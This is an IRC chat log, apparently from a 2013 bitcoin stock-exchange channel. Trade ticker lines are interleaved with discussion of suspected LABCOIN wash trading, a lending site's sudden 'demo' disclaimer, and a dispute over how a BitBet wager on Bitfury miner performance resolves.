[LABCOIN] 3743 @ 0.003929 = 14.7062 BTC [-] Aug 29 19:31:21 i guess that term is good enough Aug 29 19:31:27 [BTCTC] [LABCOIN] 100 @ 0.003939 = 0.3939 BTC [+] Aug 29 19:31:28 [BTCTC] [LABCOIN] 130 @ 0.00395 = 0.5135 BTC [+] Aug 29 19:31:30 [BTCTC] [LABCOIN] 50 @ 0.00395 = 0.1975 BTC [+] Aug 29 19:31:31 [BTCTC] [LABCOIN] 500 @ 0.00395 = 1.975 BTC [+] Aug 29 19:31:32 [BTCTC] [LABCOIN] 7247 @ 0.00395 = 28.6257 BTC [+] Aug 29 19:31:44 [BTCTC] [LABCOIN] 1050 @ 0.00397 = 4.1685 BTC [+] Aug 29 19:32:14 [BTCTC] [LABCOIN] 500 @ 0.003974 = 1.987 BTC [+] Aug 29 19:32:55 [BTCTC] [LABCOIN] 20 @ 0.00397 = 0.0794 BTC [-] Aug 29 19:32:58 [BTCTC] [LABCOIN] 1800 @ 0.003975 = 7.155 BTC [+] Aug 29 19:33:27 cheap LABCO shares on Havelock Aug 29 19:33:30 ThickAsThieves wash trading, for the wash trading part. Aug 29 19:33:35 pump and dump, for the pump and dump part. Aug 29 19:33:37 i see the mp's anatomy in the very end of first page Aug 29 19:33:37 [BTCTC] [LABCOIN] 250 @ 0.003975 = 0.9938 BTC [+] Aug 29 19:33:38 [BTCTC] [LABCOIN] 17 @ 0.00397 = 0.0675 BTC [-] Aug 29 19:33:47 jurov so 9 ? 10 ? Aug 29 19:33:54 [BTCTC] [ASICMINER-PT] 1 @ 2.686 BTC [+] Aug 29 19:33:55 [BTCTC] [LABCOIN] 300 @ 0.00395 = 1.185 BTC [-] Aug 29 19:34:04 ThickAsThieves what are they at on havelock ? Aug 29 19:34:11 10 Aug 29 19:34:26 33ish Aug 29 19:34:32 heh. Aug 29 19:34:39 very little movement there too Aug 29 19:34:43 i guess this suggests topace's not in on the scam. Aug 29 19:35:04 spread is 26 - 33 Aug 29 19:35:38 [BTCTC] [DMS.MINING] 118 @ 0.00345 = 0.4071 BTC [-] Aug 29 19:35:40 [BTCTC] [DMS.MINING] 50 @ 0.00345 = 0.1725 BTC [-] Aug 29 19:35:41 [BTCTC] [DMS.MINING] 21 @ 0.00345 = 0.0725 BTC [-] Aug 29 19:35:42 [BTCTC] [DMS.MINING] 8 @ 0.003411 = 0.0273 BTC [-] Aug 29 19:35:44 [BTCTC] [DMS.MINING] 3 @ 0.003405 = 0.0102 BTC [-] Aug 29 19:35:45 [BTCTC] [DMS.MINING] 211 @ 0.003405 = 0.7185 BTC [-] Aug 29 19:35:45 [BTCTC] [DMS.MINING] 100 @ 0.0034 = 0.34 BTC [-] Aug 29 19:35:47 [BTCTC] [DMS.MINING] 300 @ 0.0034 = 1.02 BTC [-] Aug 29 19:35:48 [BTCTC] [DMS.MINING] 48 @ 0.00337 = 0.1618 BTC [-] Aug 29 19:35:50 [BTCTC] [DMS.MINING] 10 @ 0.00337 = 0.0337 BTC [-] Aug 29 19:35:51 [BTCTC] [DMS.MINING] 8 @ 0.003355 = 0.0268 BTC [-] Aug 29 19:35:52 [BTCTC] [DMS.MINING] 6 @ 0.003354 = 0.0201 BTC [-] Aug 29 19:35:53 [BTCTC] [DMS.MINING] 4 @ 0.003353 = 0.0134 BTC [-] Aug 29 19:35:56 [BTCTC] [BITVPS] 2 @ 0.002857 = 0.0057 BTC [+] Aug 29 19:36:07 [BTCTC] [BASIC-MINING] 1 @ 0.1933 BTC [-] Aug 29 19:36:47 "I think people are missing the significance of a 50% div payout. Most people will reinvest it into ACtM and that will give the share price much needed buying pressure and stabilise the stock at a reasonable level. Aug 29 19:36:55 [BTCTC] [ACTIVEMINING] 440 @ 0.004122 = 1.8137 BTC [+] Aug 29 19:36:55 [BTCTC] [ACTIVEMINING] 1 @ 0.004121 BTC [-] Aug 29 19:36:57 [BTCTC] [ACTIVEMINING] 5 @ 0.00412 = 0.0206 BTC [-] Aug 29 19:36:58 [BTCTC] [ACTIVEMINING] 114 @ 0.004118 = 0.4695 BTC [-] Aug 29 19:36:59 [BTCTC] [ACTIVEMINING] 16 @ 0.004116 = 0.0659 BTC [-] Aug 29 19:37:00 [BTCTC] [ACTIVEMINING] 743 @ 0.004112 = 3.0552 BTC [-] Aug 29 19:37:10 that would be shareholders buying shares the money the gave to buy shares Aug 29 19:37:14 pankkake because paying dividends out of investor's capital is not fraudulent now. Aug 29 19:37:15 [BTCTC] [DMS.SELLING] 355 @ 0.01245 = 4.4198 BTC [-] Aug 29 19:37:28 people just don't want to grok what a ponzi is. Aug 29 19:37:29 [BTCTC] [LABCOIN] 129 @ 0.003937 = 0.5079 BTC [-] Aug 29 19:37:30 [BTCTC] [LABCOIN] 84 @ 0.003938 = 0.3308 BTC [+] Aug 29 19:37:31 [BTCTC] [LABCOIN] 55 @ 0.003939 = 0.2166 BTC [+] Aug 29 19:37:32 [BTCTC] [LABCOIN] 141 @ 0.00394 = 0.5555 BTC [+] Aug 29 19:37:32 [BTCTC] [LABCOIN] 87 @ 0.003941 = 0.3429 BTC [+] Aug 29 19:37:33 [BTCTC] [LABCOIN] 21 @ 0.003942 = 0.0828 BTC [+] Aug 29 19:37:34 [BTCTC] [LABCOIN] 133 @ 0.003949 = 0.5252 BTC [+] Aug 29 19:37:36 [BTCTC] [LABCOIN] 99 @ 0.00395 = 0.3911 BTC [+] Aug 29 19:37:37 [BTCTC] [LABCOIN] 131 @ 0.003951 = 0.5176 BTC [+] Aug 29 19:37:38 [BTCTC] [LABCOIN] 91 @ 0.003959 = 0.3603 BTC [+] Aug 29 19:37:39 [BTCTC] [LABCOIN] 950 @ 0.003959 = 3.7611 BTC [+] Aug 29 19:37:41 [BTCTC] [LABCOIN] 58 @ 0.003959 = 0.2296 BTC [+] Aug 29 19:37:48 [BTCTC] [LABCOIN] 21 @ 0.003959 = 0.0831 BTC [+] Aug 29 19:37:49 [BTCTC] [LABCOIN] 120 @ 0.003959 = 0.4751 BTC [+] Aug 29 19:37:51 [BTCTC] [LABCOIN] 33 @ 0.003959 = 0.1306 BTC [+] Aug 29 19:38:29 [BTCTC] [LABCOIN] 1200 @ 0.00396 = 4.752 BTC [+] Aug 29 19:39:08 OMG LABCOIN Aug 29 19:39:27 [BTCTC] [LABCOIN] 72 @ 0.003952 = 0.2845 BTC [-] Aug 29 19:39:29 [BTCTC] [LABCOIN] 33 @ 0.003953 = 0.1304 BTC [+] Aug 29 19:39:31 [BTCTC] [LABCOIN] 114 @ 0.003954 = 0.4508 BTC [+] Aug 29 19:39:31 [BTCTC] [LABCOIN] 85 @ 0.003955 = 0.3362 BTC [+] Aug 29 19:39:32 [BTCTC] [LABCOIN] 111 @ 0.003956 = 0.4391 BTC [+] Aug 29 19:39:33 [BTCTC] [LABCOIN] 79 @ 0.003957 = 0.3126 BTC [+] Aug 29 19:39:34 [BTCTC] [LABCOIN] 117 @ 0.003958 = 0.4631 BTC [+] Aug 29 19:39:36 [BTCTC] [LABCOIN] 90 @ 0.003959 = 0.3563 BTC [+] Aug 29 19:40:00 [BTCTC] [LABCOIN] 88 @ 0.003958 = 0.3483 BTC [-] Aug 29 19:40:01 [BTCTC] [LABCOIN] 282 @ 0.003959 = 1.1164 BTC [+] Aug 29 19:40:02 [BTCTC] [LABCOIN] 400 @ 0.00396 = 1.584 BTC [+] Aug 29 19:40:26 [BTCTC] [LABCOIN] 5000 @ 0.003969 = 19.845 BTC [+] Aug 29 19:40:41 [BTCTC] [LABCOIN] 808 @ 0.00397 = 3.2078 BTC [+] Aug 29 19:40:52 [BTCTC] [LABCOIN] 2000 @ 0.003958 = 7.916 BTC [-] Aug 29 19:40:53 [BTCTC] [LABCOIN] 2312 @ 0.00397 = 9.1786 BTC [+] Aug 29 19:41:18 [BTCTC] [ACTIVEMINING] 4640 @ 0.004115 = 19.0936 BTC [+] Aug 29 19:41:21 [BTCTC] [ACTIVEMINING] 5750 @ 0.004114 = 23.6555 BTC [-] Aug 29 19:41:22 [BTCTC] [ACTIVEMINING] 9000 @ 0.004075 = 36.675 BTC [-] Aug 29 19:41:24 [BTCTC] [ACTIVEMINING] 250 @ 0.004071 = 1.0178 BTC [-] Aug 29 19:41:24 [BTCTC] [ACTIVEMINING] 359 @ 0.004065 = 1.4593 BTC [-] Aug 29 19:41:54 LABCOIN passes ACTIVEMINING soon? Aug 29 19:42:03 soon Aug 29 19:42:07 [HAVELOCK] [AM100] 1 @ 0.02531 BTC [+] Aug 29 19:42:12 They actually posted pics of "chips" :P Aug 29 19:42:22 or a chip rather Aug 29 19:42:28 yum, chips. Aug 29 19:42:34 [BTCTC] [ACTIVEMINING] 101 @ 0.004065 = 0.4106 BTC [-] Aug 29 19:42:36 [BTCTC] [ACTIVEMINING] 50 @ 0.004032 = 0.2016 BTC [-] Aug 29 19:42:37 [BTCTC] [ACTIVEMINING] 400 @ 0.00403 = 1.612 BTC [-] Aug 29 19:42:38 [BTCTC] [ACTIVEMINING] 1270 @ 0.004022 = 5.1079 BTC [-] Aug 29 19:43:05 [BTCTC] [LABCOIN] 250 @ 0.00395 = 0.9875 BTC [-] Aug 29 19:43:06 [BTCTC] [LABCOIN] 10000 @ 0.00395 = 39.5 BTC [-] Aug 29 19:43:07 [BTCTC] [LABCOIN] 105 @ 0.003953 = 0.4151 BTC [+] Aug 29 19:43:09 [BTCTC] [LABCOIN] 100 @ 0.003957 = 0.3957 BTC [+] Aug 29 19:43:10 [BTCTC] [LABCOIN] 1 @ 0.003957 BTC [+] Aug 29 19:43:11 [BTCTC] [LABCOIN] 215 @ 0.003968 = 0.8531 BTC [+] Aug 29 19:43:11 [BTCTC] [LABCOIN] 2000 @ 0.003969 = 7.938 BTC [+] Aug 29 19:43:12 [BTCTC] [LABCOIN] 2088 @ 0.00397 = 8.2894 BTC [+] Aug 29 19:43:13 lol Aug 29 19:43:14 [BTCTC] [LABCOIN] 200 @ 0.003977 = 0.7954 BTC [+] Aug 29 19:43:14 [BTCTC] [LABCOIN] 500 @ 0.003978 = 1.989 BTC [+] Aug 29 19:43:15 [BTCTC] [LABCOIN] 4541 @ 0.003978 = 18.0641 BTC [+] Aug 29 19:43:17 amazine Aug 29 19:43:19 g Aug 29 19:43:24 [BTCTC] [ACTIVEMINING] 600 @ 0.004114 = 2.4684 BTC [+] Aug 29 19:43:58 [BTCTC] [LABCOIN] 400 @ 0.003978 = 1.5912 BTC [+] Aug 29 19:44:08 [BTCTC] [LABCOIN] 77 @ 0.003978 = 0.3063 BTC [+] Aug 29 19:44:19 [BTCTC] [LABCOIN] 1840 @ 0.003978 = 7.3195 BTC [+] Aug 29 19:44:20 [BTCTC] [LABCOIN] 10 @ 0.003978 = 0.0398 BTC [+] Aug 29 19:44:37 i wonder if labcoin holders realize that no single one of them has 39.5btc to make orders like these Aug 29 19:44:37 [BTCTC] [LABCOIN] 28 @ 0.003959 = 0.1109 BTC [-] Aug 29 19:44:38 [BTCTC] [LABCOIN] 446 @ 0.003853 = 1.7184 BTC [-] Aug 29 19:44:39 [BTCTC] [LABCOIN] 267 @ 0.003852 = 1.0285 BTC [-] Aug 29 19:44:40 [BTCTC] [LABCOIN] 20 @ 0.003851 = 0.077 BTC [-] Aug 29 19:44:41 [BTCTC] [LABCOIN] 1500 @ 0.00385 = 5.775 BTC [-] Aug 29 19:44:43 [BTCTC] [LABCOIN] 500 @ 0.003801 = 1.9005 BTC [-] Aug 29 19:44:44 [BTCTC] [LABCOIN] 2000 @ 0.0038 = 7.6 BTC [-] Aug 29 19:44:48 [BTCTC] [LABCOIN] 125 @ 0.003707 = 0.4634 BTC [-] Aug 29 19:44:50 [BTCTC] [LABCOIN] 50 @ 0.003706 = 0.1853 BTC [-] Aug 29 19:44:50 [BTCTC] [LABCOIN] 350 @ 0.003704 = 1.2964 BTC [-] Aug 29 19:44:52 [BTCTC] [LABCOIN] 100 @ 0.003704 = 0.3704 BTC [-] Aug 29 19:44:52 [BTCTC] [LABCOIN] 322 @ 0.003701 = 1.1917 BTC [-] Aug 29 19:44:54 [BTCTC] [LABCOIN] 950 @ 0.0037 = 3.515 BTC [-] Aug 29 19:44:55 [BTCTC] [LABCOIN] 340 @ 0.0037 = 1.258 BTC [-] Aug 29 19:44:56 [BTCTC] [LABCOIN] 1 @ 0.00368 BTC [-] Aug 29 19:44:57 [BTCTC] [LABCOIN] 310 @ 0.003674 = 1.1389 BTC [-] Aug 29 19:44:58 [BTCTC] [LABCOIN] 2 @ 0.003673 = 0.0073 BTC [-] Aug 29 19:44:59 [BTCTC] [LABCOIN] 1240 @ 0.003671 = 4.552 BTC [-] Aug 29 19:45:00 [BTCTC] [LABCOIN] 1549 @ 0.003653 = 5.6585 BTC [-] Aug 29 19:45:01 [BTCTC] [LABCOIN] 2100 @ 0.00365 = 7.665 BTC [-] Aug 29 19:45:03 [BTCTC] [LABCOIN] 2500 @ 0.003604 = 9.01 BTC [-] Aug 29 19:45:03 [BTCTC] [LABCOIN] 10000 @ 0.003603 = 36.03 BTC [-] Aug 29 19:45:04 [BTCTC] [LABCOIN] 1041 @ 0.003601 = 3.7486 BTC [-] Aug 29 19:45:05 someone is cashing out lol Aug 29 19:45:05 [BTCTC] [LABCOIN] 100 @ 0.0036 = 0.36 BTC [-] Aug 29 19:45:06 [BTCTC] [LABCOIN] 4065 @ 0.0036 = 14.634 BTC [-] Aug 29 19:45:07 [BTCTC] [LABCOIN] 3611 @ 0.0036 = 12.9996 BTC [-] Aug 29 19:45:09 there it is Aug 29 19:45:17 dat volume Aug 29 19:45:18 [BTCTC] [BTC-GROWTH] 5 @ 0.09701 = 0.4851 BTC [-] Aug 29 19:45:25 *dump* Aug 29 19:45:33 time to buy stock in BTCT Aug 29 19:46:25 [BTCTC] [LABCOIN] 100 @ 0.0039 = 0.39 BTC [+] Aug 29 19:46:33 [BTCTC] [ACTIVEMINING] 1 @ 0.0041 BTC [-] Aug 29 19:47:04 BTCTC IPO coming soon? Aug 29 19:47:12 [BTCTC] [ACTIVEMINING] 69 @ 0.0041 = 0.2829 BTC [-] Aug 29 19:47:13 [BTCTC] [ACTIVEMINING] 1400 @ 0.004539 = 6.3546 BTC [+] Aug 29 19:47:13 [BTCTC] [ACTIVEMINING] 4640 @ 0.00454 = 21.0656 BTC [+] Aug 29 19:47:15 [BTCTC] [ACTIVEMINING] 2475 @ 0.004549 = 11.2588 BTC [+] Aug 29 19:47:17 [BTCTC] [DMS.SELLING] 1 @ 0.01259 BTC [+] Aug 29 19:47:19 "this is not money" Aug 29 19:48:55 [BTCTC] [LABCOIN] 787 @ 0.003799 = 2.9898 BTC [-] Aug 29 19:49:27 [BTCTC] [LABCOIN] 247 @ 0.00369 = 0.9114 BTC [-] Aug 29 19:49:49 mircea_popescu: what's ETA on trilema going back up? Aug 29 19:49:51 if you have one lol Aug 29 19:50:18 coinlenders is closed :P Aug 29 19:50:25 [BTCTC] [LABCOIN] 100 @ 0.003684 = 0.3684 BTC [-] Aug 29 19:50:28 [BTCTC] [LABCOIN] 255 @ 0.003683 = 0.9392 BTC [-] Aug 29 19:50:32 should be hours. Aug 29 19:50:38 [BTCTC] [ASICMINER-PT] 2 @ 2.657 = 5.314 BTC [-] Aug 29 19:51:20 [BTCTC] [LABCOIN] 15 @ 0.003682 = 0.0552 BTC [-] Aug 29 19:51:21 [BTCTC] [LABCOIN] 455 @ 0.003681 = 1.6749 BTC [-] Aug 29 19:52:07 [BTCTC] [ACTIVEMINING] 100 @ 0.00415 = 0.415 BTC [-] Aug 29 19:54:17 [BTCTC] [DMS.MINING] 5 @ 0.003459 = 0.0173 BTC [+] Aug 29 19:54:24 [BTCTC] [LABCOIN] 140 @ 0.003773 = 0.5282 BTC [+] Aug 29 19:55:43 [BTCTC] [ACTIVEMINING] 60 @ 0.00415 = 0.249 BTC [-] Aug 29 19:55:45 [HAVELOCK] [LABCO] 2 @ 0.00327 = 0.0065 BTC [+] Aug 29 19:55:48 [HAVELOCK] [LABCO] 1100 @ 0.00328 = 3.608 BTC [+] Aug 29 19:55:50 [HAVELOCK] [LABCO] 148 @ 0.00329 = 0.4869 BTC [+] Aug 29 19:56:56 [BTCTC] [ACTIVEMINING] 40 @ 0.00415 = 0.166 BTC [-] Aug 29 19:58:50 [BTCTC] [ACTIVEMINING] 1 @ 0.0042 BTC [+] Aug 29 19:59:05 [BTCTC] [LABCOIN] 660 @ 0.003699 = 2.4413 BTC [-] Aug 29 19:59:17 [BTCTC] [ASICMINER-PT] 2 @ 2.619 = 5.238 BTC [-] Aug 29 19:59:56 [BTCTC] [ASICMINER-PT] 1 @ 2.63 BTC [+] Aug 29 19:59:57 [BTCTC] [ASICMINER-PT] 1 @ 2.652 BTC [+] Aug 29 20:04:17 let's see how it does now... Aug 29 20:04:21 [BTCTC] [ACTIVEMINING] 1 @ 0.0044 BTC [+] Aug 29 20:04:22 [BTCTC] [ACTIVEMINING] 49 @ 0.004455 = 0.2183 BTC [+] Aug 29 20:05:13 [BTCTC] [LABCOIN] 9298 @ 0.00364 = 33.8447 BTC [-] Aug 29 20:05:15 [BTCTC] [LABCOIN] 702 @ 0.003646 = 2.5595 BTC [+] Aug 29 20:05:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.02515 BTC [-] Aug 29 20:05:28 At a Chaos Computer Club event in August 2011, Daniel Domscheit-Berg announced its preliminary launch and invited hackers to test the security of the OpenLeaks system, as a result of which the CCC criticized him for exploiting the good name of the club to promote his OpenLeaks project and expelled him from their club, despite his lack of membership. Aug 29 20:05:31 teh lulz. Aug 29 20:06:24 YOU CAN'T RENT HERE ANYMORE! Aug 29 20:06:38 [BTCTC] [LABCOIN] 100 @ 0.003635 = 0.3635 BTC [-] Aug 29 20:06:58 <3 clerks Aug 29 20:07:19 What a domscheit. Aug 29 20:07:24 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0008752 BTC [-] Aug 29 20:07:53 guy destroyed the leaked us no fly list, among a bunch of other stuff. total mole. Aug 29 20:08:09 [BTCTC] [LABCOIN] 20 @ 0.003606 = 0.0721 BTC [-] Aug 29 20:08:11 [BTCTC] [LABCOIN] 236 @ 0.003603 = 0.8503 BTC [-] Aug 29 20:08:11 [BTCTC] [LABCOIN] 250 @ 0.003601 = 0.9003 BTC [-] Aug 29 20:08:13 [BTCTC] [LABCOIN] 10000 @ 0.0036 = 36 BTC [-] Aug 29 20:08:14 [BTCTC] [LABCOIN] 116 @ 0.0036 = 0.4176 BTC [-] Aug 29 20:08:59 [BTCTC] [LABCOIN] 236 @ 0.003592 = 0.8477 BTC [-] Aug 29 20:09:01 [BTCTC] [LABCOIN] 264 @ 0.00359 = 0.9478 BTC [-] Aug 29 20:09:10 [BTCTC] [LABCOIN] 2 @ 0.003647 = 0.0073 BTC [+] Aug 29 20:09:30 [BTCTC] [LABCOIN] 236 @ 0.00359 = 0.8472 BTC [-] Aug 29 20:10:02 anyone that has some intelligence mind replying? https://bitcointalk.org/index.php?topic=283756.0 Aug 29 20:10:39 [BTCTC] [LABCOIN] 1 @ 0.003647 BTC [+] Aug 29 20:11:21 [BTCTC] [TAT.ASICMINER] 4 @ 0.02577 = 0.1031 BTC [+] Aug 29 20:11:24 [BTCTC] [LABCOIN] 201 @ 0.003592 = 0.722 BTC [-] Aug 29 20:11:27 [BTCTC] [LABCOIN] 19 @ 0.003647 = 0.0693 BTC [+] Aug 29 20:11:28 [BTCTC] [LABCOIN] 20 @ 0.003648 = 0.073 BTC [+] Aug 29 20:11:28 [BTCTC] [LABCOIN] 341 @ 0.003685 = 1.2566 BTC [+] Aug 29 20:11:34 TradeFortress what are you trying to do there ? Aug 29 20:12:01 provide software for people trying to run their own bonds ? Aug 29 20:12:04 [BTCTC] [DMS.MINING] 7 @ 0.003459 = 0.0242 BTC [+] Aug 29 20:12:14 mircea_popescu, ok, I guess I did a bad job explaining the changes cuz you don't get it Aug 29 20:12:15 I'll pm Aug 29 20:12:29 [BTCTC] [DMS.MINING] 71 @ 0.003459 = 0.2456 BTC [+] Aug 29 20:12:30 [BTCTC] [DMS.MINING] 229 @ 0.003499 = 0.8013 BTC [+] Aug 29 20:13:12 [BTCTC] [LABCOIN] 18 @ 0.00364 = 0.0655 BTC [-] Aug 29 20:13:27 [BTCTC] [ACTIVEMINING] 50 @ 0.004454 = 0.2227 BTC [-] Aug 29 20:13:28 [BTCTC] [ACTIVEMINING] 100 @ 0.0045 = 0.45 BTC [+] Aug 29 20:13:30 [BTCTC] [ACTIVEMINING] 460 @ 0.00454 = 2.0884 BTC [+] Aug 29 20:13:31 [BTCTC] [ACTIVEMINING] 500 @ 0.004549 = 2.2745 BTC [+] Aug 29 20:13:32 [BTCTC] [ACTIVEMINING] 250 @ 0.004569 = 1.1423 BTC [+] Aug 29 20:13:33 [BTCTC] [ACTIVEMINING] 1000 @ 0.0046 = 4.6 BTC [+] Aug 29 20:13:33 [BTCTC] [ACTIVEMINING] 430 @ 0.0047 = 2.021 BTC [+] Aug 29 20:13:34 [BTCTC] [ACTIVEMINING] 20 @ 0.004722 = 0.0944 BTC [+] Aug 29 20:13:35 [BTCTC] [ACTIVEMINING] 40 @ 0.004777 = 0.1911 BTC [+] Aug 29 20:13:36 [BTCTC] [ACTIVEMINING] 200 @ 0.00479 = 0.958 BTC [+] Aug 29 20:13:37 [BTCTC] [ACTIVEMINING] 250 @ 0.0048 = 1.2 BTC [+] Aug 29 20:13:38 [BTCTC] [ACTIVEMINING] 462 @ 0.00481 = 2.2222 BTC [+] Aug 29 20:13:40 [BTCTC] [ACTIVEMINING] 3397 @ 0.004878 = 16.5706 BTC [+] Aug 29 20:13:41 [BTCTC] [ACTIVEMINING] 350 @ 0.00489 = 1.7115 BTC [+] Aug 29 20:13:42 [BTCTC] [ACTIVEMINING] 1360 @ 0.0049 = 6.664 BTC [+] Aug 29 20:13:43 [BTCTC] [ACTIVEMINING] 100 @ 0.004945 = 0.4945 BTC [+] Aug 29 20:13:44 [BTCTC] [ACTIVEMINING] 720 @ 0.00495 = 3.564 BTC [+] Aug 29 20:13:44 [BTCTC] [ACTIVEMINING] 67 @ 0.005 = 0.335 BTC [+] Aug 29 20:13:45 [BTCTC] [ACTIVEMINING] 100 @ 0.005 = 0.5 BTC [+] Aug 29 20:13:47 Time for the balancing act Aug 29 20:13:55 sell this buy that Aug 29 20:14:03 lol Aug 29 20:14:24 gotta say "demo instance" makes me want to withdraw my coins Aug 29 20:15:18 [BTCTC] [ASICMINER-PT] 1 @ 2.63 BTC [-] Aug 29 20:16:07 looks like you baited Swede in, mp Aug 29 20:16:22 Rulother it's funny how he simply went through the scammer argument list. Aug 29 20:16:43 Graet, anything you want to ask me about? Aug 29 20:16:47 supposedly if he affirms the oldest btc business is bad that makes his shit fine. Aug 29 20:17:13 i was just going to bed when i noticed changes Aug 29 20:17:34 [BTCTC] [ASICMINER-PT] 1 @ 2.639 BTC [+] Aug 29 20:17:50 Frankly I couldn't see a way to truly debate the acquisition without any sort of evidence Aug 29 20:18:00 from both sides Aug 29 20:18:05 Graet, go to bed (I should too), look at what has changed Aug 29 20:18:32 I expect the dust will settle soon Aug 29 20:19:09 [BTCTC] [PETA-MINE] 10 @ 0.65 = 6.5 BTC Aug 29 20:19:17 has anyone here recieved a working 400Gh/sec Bitfury miner? Aug 29 20:19:20 http://bitbet.us/bet/520/bitfury-eu-august-orders-will-ship-before-1st/ Aug 29 20:19:26 BitBet - Bitfury EU August orders will ship before 1st September 2013 Aug 29 20:19:27 well since i deposited coins the site has changed to have a disclaimer about nothing being real and now its a "demo" not sure what to think/ask atm Aug 29 20:19:43 trying to see if this bet will resolve no... it looks like punin missed performance specs and is trying to ship additional hardware to make up for it Aug 29 20:20:00 fractal afaik the one report was of one guy doing 60gh at 54 watts Aug 29 20:20:40 Graet, the same way you should think about a " fictional fantasy stock market simulation" or a site that "takes no responsibility" Aug 29 20:20:53 hmm need to edit "support" page What is CoinLenders? Aug 29 20:20:53 CoinLenders is a website that offers (and keeps track of) bitcoin loans, and also offers credit ratings / ID verifications. We also plan on additional features over time. Aug 29 20:20:59 so, there needs to be at least 5 reports, and one of them has to at least show a working, self-contained 400Gh unit? Aug 29 20:21:15 Graet, that's technically correct, it's just part of the demo. Aug 29 20:22:02 too many technicalities Aug 29 20:22:11 technically Aug 29 20:22:29 punin has admitted the hardware is falling short on performance, and is shipping additional hardware to make up for it. there is a lot of discussion on bitbet. If you do the math, -- it makes it imporssible for 400Gh unit to hit specs. Aug 29 20:22:44 [BTCTC] [ASICMINER-PT] 1 @ 2.64 BTC [+] Aug 29 20:22:56 perhaps. Aug 29 20:23:05 what i've seen was two boards each hashing > 25gh tho Aug 29 20:23:21 mircea_popescu: If noone posts evidence of a 400Gh unit then the bet is a NO. correct? Aug 29 20:24:05 yeah, need at least an example of each type Aug 29 20:24:39 mircea_popescu: can you fwd a link for that? nobody on the forums has a single board above 25Gh.. they're all running around 19-20Gh. Aug 29 20:24:42 how do you do the math coming out that 400gh is impossible ? Aug 29 20:24:59 wasn't anduck's thing hashing ~60gh at 54 watts ? Aug 29 20:25:04 or was it 50gh Aug 29 20:25:22 68 ghash Aug 29 20:25:28 at 52 watts actually Aug 29 20:25:32 fractal https://bitcointalk.org/index.php?topic=250249.msg3025781#msg3025781 this thuing Aug 29 20:25:37 or 67 ghash.. Aug 29 20:25:41 it varies a little Aug 29 20:25:55 [BTCTC] [LABCOIN] 46 @ 0.003559 = 0.1637 BTC [-] Aug 29 20:25:56 [BTCTC] [LABCOIN] 1 @ 0.003558 BTC [-] Aug 29 20:26:06 [BTCTC] [ASICMINER-PT] 1 @ 2.62 BTC [-] Aug 29 20:26:15 mircea_popescu: the bitbury architecture is modular -- inside the 400Gh miner case, there is a M-board with 16 slots on it -- each M-board is only hashing around 20Gh, as per punin's admission. ... therefore the maximum hashrate inside a single self-contained unit, or device, is 320Gh. Aug 29 20:26:28 they were sold as kits Aug 29 20:26:35 [BTCTC] [ASICMINER-PT] 1 @ 2.59 BTC [-] Aug 29 20:26:36 a kit promised 25 ghash or 400 ghash Aug 29 20:26:37 [BTCTC] [ASICMINER-PT] 1 @ 2.58 BTC [-] Aug 29 20:26:44 they all get what they were promised Aug 29 20:26:56 and their kits deliver the _promised performance_ that the bet was about Aug 29 20:26:57 [HAVELOCK] [LABCO] 2 @ 0.00329 = 0.0066 BTC [+] Aug 29 20:27:11 the bet was about "promised performance" and 5 confirmed deliveries, right? Aug 29 20:27:28 Anduck: No, you're wrong, read the bet language. a 400Gh 'DEVICE' has to exist... as in a single unit. Aug 29 20:27:34 This does not exist. Aug 29 20:27:42 o boy. this is gonna be one of those huh. Aug 29 20:27:46 there never was going to be a device of 400 ghash??? Aug 29 20:27:57 [BTCTC] [LABCOIN] 219 @ 0.00366 = 0.8015 BTC [+] Aug 29 20:27:58 [BTCTC] [LABCOIN] 2281 @ 0.003662 = 8.353 BTC [+] Aug 29 20:28:06 fractal: they were and always were sold as kits Aug 29 20:28:11 the wording "unit" means "kit" in the bet Aug 29 20:28:16 i know it because i wrote it Aug 29 20:28:22 i chose a little bad word Aug 29 20:28:38 but what i meant is that customer gets the performance he ordered Aug 29 20:28:42 Anduck: 'Kit" ... not 'KITS' .... they missed performance. punin has admitted it Aug 29 20:28:53 a kit is a kit.. Aug 29 20:29:11 the customer promised performance is met within the kit Aug 29 20:29:32 people who bought starter kit will be delivered atleast 25ghash hashing miner Aug 29 20:29:32 thats not what the bet says -- sorry Aug 29 20:29:34 [BTCTC] [DMS.MINING] 10 @ 0.003499 = 0.035 BTC [+] Aug 29 20:29:45 Anduck: thats great -- but thats not what they bet says Aug 29 20:29:49 i don't really see how one could understand the wording so wrong Aug 29 20:29:53 thats really only semantics Aug 29 20:30:41 Anduck: Words are words. No 400Gh miner exists. mircea_popescu stated that one has to be posted to the forums as a confirmed delivery. the only way this bet can be a yes at this point is for someone to lie -- Aug 29 20:30:50 [BTCTC] [TAT.ASICMINER] 2 @ 0.02575 = 0.0515 BTC [-] Aug 29 20:30:52 dude fractal... "Devices must meet advertised performance (25 GH/s unit 40W, 400 GH/s unit 400W)" < as you can see, the condition is in the ( and ). and the condition is met Aug 29 20:30:52 [BTCTC] [TAT.ASICMINER] 6 @ 0.0255 = 0.153 BTC [-] Aug 29 20:31:23 400 ghash kit is built from the h-boards that are used in the 25gh kit, too Aug 29 20:31:44 Anduck: no, you're wrong. Aug 29 20:31:47 i also do not see it as a requirement that someone from the 5 confirmed deliveries must have ordered exactly 400 ghash kit Aug 29 20:32:02 [BTCTC] [LABCOIN] 203 @ 0.003602 = 0.7312 BTC [-] Aug 29 20:32:03 well it's only semantics after that. Customers got what they were promised. Aug 29 20:32:04 [BTCTC] [LABCOIN] 797 @ 0.0036 = 2.8692 BTC [-] Aug 29 20:32:10 Anduck: mircea_popescu himself stated that it needs to be 400Gh AND under 400W. I have chat logs. it was from 2 days ago. Aug 29 20:32:28 Anduck: sorry for you, but the language in the statement disagrees with you. Aug 29 20:32:40 that is only semantics as i said. Aug 29 20:32:45 [BTCTC] [LABCOIN] 20 @ 0.00366 = 0.0732 BTC [+] Aug 29 20:32:46 [BTCTC] [LABCOIN] 20 @ 0.003661 = 0.0732 BTC [+] Aug 29 20:32:48 [BTCTC] [LABCOIN] 70 @ 0.003671 = 0.257 BTC [+] Aug 29 20:32:54 Anduck: which means the bet is a NO. Aug 29 20:32:56 the customer promises _are_ met 100% Aug 29 20:33:02 and the bet was about that Aug 29 20:33:11 [HAVELOCK] [AM100] 1 @ 0.0253 BTC [-] Aug 29 20:33:31 Anduck: no they weren't. no 400Gh unit exists as per punin's admission --- also, thats not what the statement says. Aug 29 20:33:31 the "promised performance" means that customers will get the hashing rate they ordered at the energy cost they were told it will eat Aug 29 20:33:37 punin: 